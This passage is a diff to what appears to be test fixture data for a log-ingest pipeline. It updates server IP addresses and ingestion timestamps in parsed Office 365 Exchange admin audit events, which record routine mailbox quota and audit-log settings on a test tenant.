"ingested": "2021-12-09T13:42:30.853239200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4181,12 +4181,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4229,7 +4229,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4241,8 +4241,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177716200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": 
"2021-12-09T13:42:30.853245Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4262,12 +4262,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4310,7 +4310,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4322,8 +4322,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177719400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853250700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4343,12 +4343,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4391,7 +4391,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4403,8 +4403,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177722200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853256600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4424,12 +4424,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4461,7 +4461,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4473,8 +4473,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177725400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853262400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4494,12 +4494,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4531,7 +4531,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4543,8 +4543,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177728500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853268100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4564,12 +4564,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4612,7 +4612,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4624,8 +4624,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177731300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853274600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 